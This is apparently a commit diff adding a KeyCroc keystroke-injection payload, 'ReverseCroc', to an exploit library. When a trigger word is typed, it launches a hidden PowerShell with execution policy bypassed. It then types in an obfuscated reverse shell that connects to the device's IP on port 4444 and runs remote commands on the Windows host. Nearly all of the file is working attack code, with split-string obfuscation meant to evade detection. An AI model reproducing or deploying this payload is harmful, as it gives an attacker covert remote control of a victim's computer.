Created ReverseCroc

Obfuscated reverse shell, via powershell, connecting to the KeyCroc.

library/exploit/WIN_ReverseCroc.txt

@@ -0,0 +1,52 @@
+##########################ReverseCroc#################################
+#	Version 1.0
+#       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+#       Author: 0iphor13
+
+################Reverse shell executed in the background################
+################Fill in Attacker-IP and Port in Line 19#################
+################DON'T FORGET TO START LISTENER ON THE KEYCROC###########
+
+MATCH shelldon	
+
+export DUCKY_LANG=de
+
+QUACK LOCK
+
+####################Get KeyCrocs IP-Adress###########################
+
+croc_ip=$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
+croc_port=4444
+
+###################Obfuscated reverse shell in Powershell#####################
+
+DELAY 1500
+Q GUI r
+DELAY 500
+Q STRING powershell -NoP -NonI -W hidden -Exec Bypass
+DELAY 250
+Q ENTER
+
+DELAY 200
+Q STRING "\$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient"
+DELAY 200
+Q STRING "('$croc_ip',$croc_port);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..655"
+DELAY 200
+Q STRING "35|.('%'){0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$da"
+DELAY 200
+Q STRING "ta = (.('Ne'+'w-O'+'bject') -TypeName SystEM.tEXt.aSCiIEnCodinG).GetString(\$byt"
+DELAY 200
+Q STRING "es,0, \$i);\$sendback = (.('i'+'ex') \$data 2>&1 | .('Out-'+'Str'+'in'+'g') );\$sen"
+DELAY 200
+Q STRING "dback2 = \$sendback + 'PS ' + (&('p'+'wd')).Path + '> ';\$sendbyte = ([text.e"
+DELAY 200
+Q STRING "ncoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Len"
+DELAY 200
+Q STRING "gth);\$stream.Flush()};\$client.Close()"
+DELAY 100
+Q ENTER
+
+QUACK UNLOCK
+
+
+